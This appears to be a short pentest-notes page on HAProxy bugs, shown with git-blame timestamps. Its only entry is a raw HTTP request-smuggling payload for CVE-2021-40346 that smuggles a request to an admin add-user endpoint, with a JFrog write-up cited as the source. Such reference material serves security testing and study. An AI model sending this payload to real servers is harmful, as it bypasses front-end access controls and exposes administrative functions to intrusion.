2022-06-18 13:26:55 +00:00
|
|
|
# HAProxy Common Bugs
|
|
|
|
|
|
|
|
|
|
## Introduction
|
|
|
|
|
What would you do if you came across a website that uses HAProxy?
|
|
|
|
|
|
|
|
|
|
## How to Detect
|
2022-06-22 04:41:21 +00:00
|
|
|
`-`
|
2022-06-18 13:26:55 +00:00
|
|
|
|
2021-11-13 23:21:02 +00:00
|
|
|
1. CVE-2021-40346 (HTTP Request Smuggling)
|
|
|
|
|
```
|
|
|
|
|
POST /index.html HTTP/1.1
|
|
|
|
|
Host: abc.com
|
|
|
|
|
Content-Length0aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:
|
|
|
|
|
Content-Length: 60
|
|
|
|
|
|
|
|
|
|
GET /admin/add_user.py HTTP/1.1
|
|
|
|
|
Host: abc.com
|
|
|
|
|
abc: xyz
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Source:
|
|
|
|
|
- [JFrog](https://jfrog.com/blog/critical-vulnerability-in-haproxy-cve-2021-40346-integer-overflow-enables-http-smuggling/)
|
